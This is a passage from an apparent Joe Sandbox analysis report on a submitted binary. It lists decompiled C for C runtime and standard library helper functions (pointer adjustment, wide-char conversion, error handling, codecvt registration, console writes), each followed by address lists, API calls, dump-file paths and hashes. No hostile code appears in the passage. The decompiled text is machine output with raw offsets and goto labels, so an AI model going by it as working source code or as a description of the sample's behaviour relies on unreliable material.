									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E009FB801(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E009FC501(_t103, _t108[0x18], E009FA50A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E009FC511(_t103, _t108[0x18], E009FA50A( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E009FA50A();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}



















                                                                                                                                                                          0x009fb801
                                                                                                                                                                          0x009fb803
                                                                                                                                                                          0x009fb808
                                                                                                                                                                          0x009fb80d
                                                                                                                                                                          0x009fb80f
                                                                                                                                                                          0x009fb812
                                                                                                                                                                          0x009fb817
                                                                                                                                                                          0x009fb927
                                                                                                                                                                          0x009fb927
                                                                                                                                                                          0x009fb927
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb826
                                                                                                                                                                          0x009fb826
                                                                                                                                                                          0x009fb82b
                                                                                                                                                                          0x009fb835
                                                                                                                                                                          0x009fb837
                                                                                                                                                                          0x009fb83c
                                                                                                                                                                          0x009fb841
                                                                                                                                                                          0x009fb841
                                                                                                                                                                          0x009fb843
                                                                                                                                                                          0x009fb846
                                                                                                                                                                          0x009fb84b
                                                                                                                                                                          0x009fb86d
                                                                                                                                                                          0x009fb86d
                                                                                                                                                                          0x009fb870
                                                                                                                                                                          0x009fb873
                                                                                                                                                                          0x009fb891
                                                                                                                                                                          0x009fb894
                                                                                                                                                                          0x009fb8d3
                                                                                                                                                                          0x009fb8d6
                                                                                                                                                                          0x009fb8d9
                                                                                                                                                                          0x009fb8fe
                                                                                                                                                                          0x009fb900
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb902
                                                                                                                                                                          0x009fb902
                                                                                                                                                                          0x009fb904
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb906
                                                                                                                                                                          0x009fb906
                                                                                                                                                                          0x009fb90b
                                                                                                                                                                          0x009fb90f
                                                                                                                                                                          0x009fb90f
                                                                                                                                                                          0x009fb910
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb910
                                                                                                                                                                          0x009fb904
                                                                                                                                                                          0x009fb8db
                                                                                                                                                                          0x009fb8db
                                                                                                                                                                          0x009fb8dd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8df
                                                                                                                                                                          0x009fb8df
                                                                                                                                                                          0x009fb8e1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8e3
                                                                                                                                                                          0x009fb8f4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8f9
                                                                                                                                                                          0x009fb8e1
                                                                                                                                                                          0x009fb8dd
                                                                                                                                                                          0x009fb896
                                                                                                                                                                          0x009fb896
                                                                                                                                                                          0x009fb89a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8a0
                                                                                                                                                                          0x009fb8a0
                                                                                                                                                                          0x009fb8a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8a8
                                                                                                                                                                          0x009fb8af
                                                                                                                                                                          0x009fb8b7
                                                                                                                                                                          0x009fb8bb
                                                                                                                                                                          0x009fb8bd
                                                                                                                                                                          0x009fb8c0
                                                                                                                                                                          0x009fb8c5
                                                                                                                                                                          0x009fb8c6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8c6
                                                                                                                                                                          0x009fb8c0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb8bb
                                                                                                                                                                          0x009fb8a2
                                                                                                                                                                          0x009fb89a
                                                                                                                                                                          0x009fb875
                                                                                                                                                                          0x009fb875
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb875
                                                                                                                                                                          0x009fb852
                                                                                                                                                                          0x009fb852
                                                                                                                                                                          0x009fb857
                                                                                                                                                                          0x009fb85c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb85e
                                                                                                                                                                          0x009fb860
                                                                                                                                                                          0x009fb869
                                                                                                                                                                          0x009fb878
                                                                                                                                                                          0x009fb87a
                                                                                                                                                                          0x009fb939
                                                                                                                                                                          0x009fb939
                                                                                                                                                                          0x009fb93e
                                                                                                                                                                          0x009fb93f
                                                                                                                                                                          0x009fb941
                                                                                                                                                                          0x009fb946
                                                                                                                                                                          0x009fb94b
                                                                                                                                                                          0x009fb94e
                                                                                                                                                                          0x009fb951
                                                                                                                                                                          0x009fb954
                                                                                                                                                                          0x009fb95d
                                                                                                                                                                          0x009fb95d
                                                                                                                                                                          0x009fb956
                                                                                                                                                                          0x009fb956
                                                                                                                                                                          0x009fb956
                                                                                                                                                                          0x009fb960
                                                                                                                                                                          0x009fb964
                                                                                                                                                                          0x009fb967
                                                                                                                                                                          0x009fb968
                                                                                                                                                                          0x009fb969
                                                                                                                                                                          0x009fb96a
                                                                                                                                                                          0x009fb96d
                                                                                                                                                                          0x009fb976
                                                                                                                                                                          0x009fb976
                                                                                                                                                                          0x009fb979
                                                                                                                                                                          0x009fb9af
                                                                                                                                                                          0x009fb97b
                                                                                                                                                                          0x009fb97b
                                                                                                                                                                          0x009fb97b
                                                                                                                                                                          0x009fb97e
                                                                                                                                                                          0x009fb995
                                                                                                                                                                          0x009fb995
                                                                                                                                                                          0x009fb97e
                                                                                                                                                                          0x009fb9b4
                                                                                                                                                                          0x009fb9be
                                                                                                                                                                          0x009fb9ca
                                                                                                                                                                          0x009fb888
                                                                                                                                                                          0x009fb888
                                                                                                                                                                          0x009fb88d
                                                                                                                                                                          0x009fb88e
                                                                                                                                                                          0x009fb8c8
                                                                                                                                                                          0x009fb8cf
                                                                                                                                                                          0x009fb913
                                                                                                                                                                          0x009fb913
                                                                                                                                                                          0x009fb91a
                                                                                                                                                                          0x009fb929
                                                                                                                                                                          0x009fb92c
                                                                                                                                                                          0x009fb938
                                                                                                                                                                          0x009fb938
                                                                                                                                                                          0x009fb87a
                                                                                                                                                                          0x009fb85c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fb82b

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                          • Opcode ID: 9aa062fa47471942fb655f25693170a297c1dc0a9ec6ebbeee7e7c3935e5486d
                                                                                                                                                                          • Instruction ID: 5d1f4affb5e31d97f0619502520ed5473281892a29164d7d17486aba7cdc1cda
                                                                                                                                                                          • Opcode Fuzzy Hash: 9aa062fa47471942fb655f25693170a297c1dc0a9ec6ebbeee7e7c3935e5486d
                                                                                                                                                                          • Instruction Fuzzy Hash: 6351E2B2A0420EEFDB288F54D841BBA77A8FF84718F14452DEB0647291E771ED80CB90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0B4D6 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0B4D6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E00A0B091(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E00A0B091(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E009FEB75(GetLastError());
									_t19 =  *((intOrPtr*)(E009FEBAB(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E00A0BA9C(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E009FEB75(GetLastError());
						return  *((intOrPtr*)(E009FEBAB(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E00A0BA9C(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E00A00918(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}











                                                                                                                                                                          0x00a0b4dd
                                                                                                                                                                          0x00a0b4e2
                                                                                                                                                                          0x00a0b500
                                                                                                                                                                          0x00a0b502
                                                                                                                                                                          0x00a0b505
                                                                                                                                                                          0x00a0b532
                                                                                                                                                                          0x00a0b53a
                                                                                                                                                                          0x00a0b53c
                                                                                                                                                                          0x00a0b555
                                                                                                                                                                          0x00a0b558
                                                                                                                                                                          0x00a0b55b
                                                                                                                                                                          0x00a0b569
                                                                                                                                                                          0x00a0b578
                                                                                                                                                                          0x00a0b580
                                                                                                                                                                          0x00a0b582
                                                                                                                                                                          0x00a0b59b
                                                                                                                                                                          0x00a0b59e
                                                                                                                                                                          0x00a0b59e
                                                                                                                                                                          0x00a0b584
                                                                                                                                                                          0x00a0b58b
                                                                                                                                                                          0x00a0b596
                                                                                                                                                                          0x00a0b596
                                                                                                                                                                          0x00a0b5a0
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b5a0
                                                                                                                                                                          0x00a0b560
                                                                                                                                                                          0x00a0b565
                                                                                                                                                                          0x00a0b567
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b567
                                                                                                                                                                          0x00a0b545
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b550
                                                                                                                                                                          0x00a0b507
                                                                                                                                                                          0x00a0b50a
                                                                                                                                                                          0x00a0b50d
                                                                                                                                                                          0x00a0b520
                                                                                                                                                                          0x00a0b523
                                                                                                                                                                          0x00a0b4f6
                                                                                                                                                                          0x00a0b4f6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b4f9
                                                                                                                                                                          0x00a0b513
                                                                                                                                                                          0x00a0b518
                                                                                                                                                                          0x00a0b51a
                                                                                                                                                                          0x00a0b5a4
                                                                                                                                                                          0x00a0b5a4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0b51a
                                                                                                                                                                          0x00a0b4e4
                                                                                                                                                                          0x00a0b4e9
                                                                                                                                                                          0x00a0b4ee
                                                                                                                                                                          0x00a0b4f0
                                                                                                                                                                          0x00a0b4f3
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00A00918: _free.LIBCMT ref: 00A00926
                                                                                                                                                                            • Part of subcall function 00A0B091: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,00A073B9,?,00000000,00000000), ref: 00A0B13D
                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00A0B53E
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A0B545
                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00A0B584
                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 00A0B58B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 167067550-0
                                                                                                                                                                          • Opcode ID: 1d329c6f371069f197cc35fdaf9a33887d384598fb3d3017a45e565bc81b6366
                                                                                                                                                                          • Instruction ID: f0ac214915e6711834e62a540b32cfd05c754a01605785fc7ecbe220bc02bd22
                                                                                                                                                                          • Opcode Fuzzy Hash: 1d329c6f371069f197cc35fdaf9a33887d384598fb3d3017a45e565bc81b6366
                                                                                                                                                                          • Instruction Fuzzy Hash: EA21D37162060EBFDB20AF66AE80D6BB7ACEF443657108554F926A71D0EB31FD4087B0
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A04327 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                          			E00A04327(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0xa44d20; // 0x2
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00A064F7(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00A04422(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00A064F7(__eflags,  *0xa44d20, _t18);
							if(__eflags != 0) {
								E00A03FFE(_t18, 0xa46524);
								E00A0447F(0);
								goto L13;
							} else {
								_t13 = 0;
								E00A064F7(__eflags,  *0xa44d20, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00A064F7(0,  *0xa44d20, 0);
							_push(0);
							L9:
							E00A0447F();
							goto L4;
						}
					}
				} else {
					_t18 = E00A064B8(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0xa44d20; // 0x2
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                                                                                                                                                          0x00a04332
                                                                                                                                                                          0x00a04334
                                                                                                                                                                          0x00a04339
                                                                                                                                                                          0x00a0433c
                                                                                                                                                                          0x00a0435a
                                                                                                                                                                          0x00a0435d
                                                                                                                                                                          0x00a04362
                                                                                                                                                                          0x00a04364
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a04366
                                                                                                                                                                          0x00a04372
                                                                                                                                                                          0x00a04376
                                                                                                                                                                          0x00a04378
                                                                                                                                                                          0x00a0439d
                                                                                                                                                                          0x00a0439f
                                                                                                                                                                          0x00a043b8
                                                                                                                                                                          0x00a043bf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a043a1
                                                                                                                                                                          0x00a043a1
                                                                                                                                                                          0x00a043aa
                                                                                                                                                                          0x00a043af
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a043af
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a0437a
                                                                                                                                                                          0x00a04383
                                                                                                                                                                          0x00a04388
                                                                                                                                                                          0x00a04389
                                                                                                                                                                          0x00a04389
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0438e
                                                                                                                                                                          0x00a04378
                                                                                                                                                                          0x00a0433e
                                                                                                                                                                          0x00a04344
                                                                                                                                                                          0x00a04348
                                                                                                                                                                          0x00a04355
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00a0434a
                                                                                                                                                                          0x00a0434d
                                                                                                                                                                          0x00a043c7
                                                                                                                                                                          0x00a043c7
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a0434f
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a04351
                                                                                                                                                                          0x00a0434d
                                                                                                                                                                          0x00a04348
                                                                                                                                                                          0x00a043ca
                                                                                                                                                                          0x00a043d2
                                                                                                                                                                          0x00a043db

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetLastError.KERNEL32(00000001,00000001,00000002,009FEBB0,00A04E62,00000000,?,009F9867,00000002,00000000,?,?,?,009F1D1E,00000001,00000004), ref: 00A0432C
                                                                                                                                                                          • _free.LIBCMT ref: 00A04389
                                                                                                                                                                          • _free.LIBCMT ref: 00A043BF
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000002,000000FF,?,009F9867,00000002,00000000,?,?,?,009F1D1E,00000001,00000004), ref: 00A043CA
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast_free
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2283115069-0
                                                                                                                                                                          • Opcode ID: ecaa240c509fe6872d73ac793972f93fadd162687d4061ccf45aec72129d4bba
                                                                                                                                                                          • Instruction ID: 36a7c7bb37d6afd7fad6341020a48544e4033cf5ec3226aac11f83294e3ad033
                                                                                                                                                                          • Opcode Fuzzy Hash: ecaa240c509fe6872d73ac793972f93fadd162687d4061ccf45aec72129d4bba
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B114CFB60410D6BC70163F57D85F2A2269BBCD3757241334F7208A1E0DE228C125112
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009F7362 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 76%
                                                                                                                                                                          			E009F7362(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t36;
				void* _t41;
				intOrPtr* _t64;
				intOrPtr* _t75;
				intOrPtr* _t76;
				void* _t78;

				_t58 = __ebx;
				_push(8);
				E009F8FAE(0xa13b1b, __ebx, __edi, __esi);
				E009F6A1B(_t78 - 0x14, 0);
				_t75 =  *0xa45c74; // 0x0
				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
				 *((intOrPtr*)(_t78 - 0x10)) = _t75;
				_t36 = E009F3B10( *((intOrPtr*)(_t78 + 8)), E009F3230());
				_t73 = _t36;
				if(_t36 != 0) {
					L5:
					E009F6A73(_t78 - 0x14);
					return E009F8F8B(_t73);
				} else {
					if(_t75 == 0) {
						_push( *((intOrPtr*)(_t78 + 8)));
						_push(_t78 - 0x10);
						_t41 = E009F7871(__ebx, _t73, _t75, __eflags);
						_pop(_t64);
						__eflags = _t41 - 0xffffffff;
						if(__eflags == 0) {
							E009F4050(__ebx, __edx, _t73, _t75, __eflags);
							asm("int3");
							_push(8);
							E009F8FAE(0xa13b59, __ebx, _t73, _t75);
							_t76 = _t64;
							 *((intOrPtr*)(_t78 - 0x14)) = _t76;
							 *((intOrPtr*)(_t78 - 0x10)) = 0;
							__eflags =  *((intOrPtr*)(_t78 + 0x10));
							if( *((intOrPtr*)(_t78 + 0x10)) != 0) {
								 *_t76 = 0xa15784;
								 *((intOrPtr*)(_t76 + 0x10)) = 0;
								 *((intOrPtr*)(_t76 + 0x30)) = 0;
								 *((intOrPtr*)(_t76 + 0x34)) = 0;
								 *((intOrPtr*)(_t76 + 0x38)) = 0;
								 *((intOrPtr*)(_t76 + 8)) = 0xa15778;
								 *(_t78 - 4) = 0;
								 *((intOrPtr*)(_t78 - 0x10)) = 1;
							}
							 *((intOrPtr*)(_t76 +  *((intOrPtr*)( *_t76 + 4)))) = 0xa15780;
							_t28 =  *((intOrPtr*)( *_t76 + 4)) - 8; // -8
							 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 4)) + _t76 - 4)) = _t28;
							__eflags =  *((intOrPtr*)( *_t76 + 4)) + _t76;
							E009F7B7C(_t58,  *((intOrPtr*)( *_t76 + 4)) + _t76, _t73,  *((intOrPtr*)( *_t76 + 4)) + _t76,  *((intOrPtr*)(_t78 + 8)),  *((intOrPtr*)(_t78 + 0xc)));
							return E009F8F8B(_t76);
						} else {
							_t73 =  *((intOrPtr*)(_t78 - 0x10));
							 *((intOrPtr*)(_t78 - 0x10)) = _t73;
							 *(_t78 - 4) = 1;
							E009F6D66(__eflags, _t73);
							 *0xa1413c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t73 + 4))))();
							 *0xa45c74 = _t73;
							goto L5;
						}
					} else {
						_t73 = _t75;
						goto L5;
					}
				}
			}









                                                                                                                                                                          0x009f7362
                                                                                                                                                                          0x009f7362
                                                                                                                                                                          0x009f7369
                                                                                                                                                                          0x009f7373
                                                                                                                                                                          0x009f7378
                                                                                                                                                                          0x009f7383
                                                                                                                                                                          0x009f7387
                                                                                                                                                                          0x009f7393
                                                                                                                                                                          0x009f7398
                                                                                                                                                                          0x009f739c
                                                                                                                                                                          0x009f73e1
                                                                                                                                                                          0x009f73e4
                                                                                                                                                                          0x009f73f0
                                                                                                                                                                          0x009f739e
                                                                                                                                                                          0x009f73a0
                                                                                                                                                                          0x009f73a6
                                                                                                                                                                          0x009f73ac
                                                                                                                                                                          0x009f73ad
                                                                                                                                                                          0x009f73b3
                                                                                                                                                                          0x009f73b4
                                                                                                                                                                          0x009f73b7
                                                                                                                                                                          0x009f73f1
                                                                                                                                                                          0x009f73f6
                                                                                                                                                                          0x009f73f7
                                                                                                                                                                          0x009f73fe
                                                                                                                                                                          0x009f7403
                                                                                                                                                                          0x009f7405
                                                                                                                                                                          0x009f740a
                                                                                                                                                                          0x009f740d
                                                                                                                                                                          0x009f7410
                                                                                                                                                                          0x009f7412
                                                                                                                                                                          0x009f7418
                                                                                                                                                                          0x009f741b
                                                                                                                                                                          0x009f741e
                                                                                                                                                                          0x009f7421
                                                                                                                                                                          0x009f7424
                                                                                                                                                                          0x009f742b
                                                                                                                                                                          0x009f742e
                                                                                                                                                                          0x009f742e
                                                                                                                                                                          0x009f7440
                                                                                                                                                                          0x009f744c
                                                                                                                                                                          0x009f744f
                                                                                                                                                                          0x009f7458
                                                                                                                                                                          0x009f745a
                                                                                                                                                                          0x009f7466
                                                                                                                                                                          0x009f73b9
                                                                                                                                                                          0x009f73b9
                                                                                                                                                                          0x009f73bc
                                                                                                                                                                          0x009f73c0
                                                                                                                                                                          0x009f73c4
                                                                                                                                                                          0x009f73d1
                                                                                                                                                                          0x009f73d9
                                                                                                                                                                          0x009f73db
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f73db
                                                                                                                                                                          0x009f73a2
                                                                                                                                                                          0x009f73a2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009f73a2
                                                                                                                                                                          0x009f73a0

                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 009F7373
                                                                                                                                                                            • Part of subcall function 009F3230: std::_Lockit::_Lockit.LIBCPMT ref: 009F323F
                                                                                                                                                                            • Part of subcall function 009F3230: std::_Lockit::~_Lockit.LIBCPMT ref: 009F325A
                                                                                                                                                                          • codecvt.LIBCPMT ref: 009F73AD
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 009F73C4
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 009F73E4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Registercodecvt
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2219260569-0
                                                                                                                                                                          • Opcode ID: 5343d75c2f54a164031b2b903aee518047e7a53bd51dd8f72fd4ab768c4c6b90
                                                                                                                                                                          • Instruction ID: 4c2787739ec310e0fab49c482b5cdade01d2818690b465340666f1e0de465271
                                                                                                                                                                          • Opcode Fuzzy Hash: 5343d75c2f54a164031b2b903aee518047e7a53bd51dd8f72fd4ab768c4c6b90
                                                                                                                                                                          • Instruction Fuzzy Hash: 2A01D23A90421DABCB04EBB4E9917BEB775AFC4720F144509EA116B291DF749E028B80
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A12A2C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A12A2C(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xa455e0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00A12A15();
					E00A129D7();
					_t13 = WriteConsoleW( *0xa455e0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                                                                                                                                                          0x00a12a49
                                                                                                                                                                          0x00a12a4d
                                                                                                                                                                          0x00a12a5a
                                                                                                                                                                          0x00a12a5f
                                                                                                                                                                          0x00a12a7a
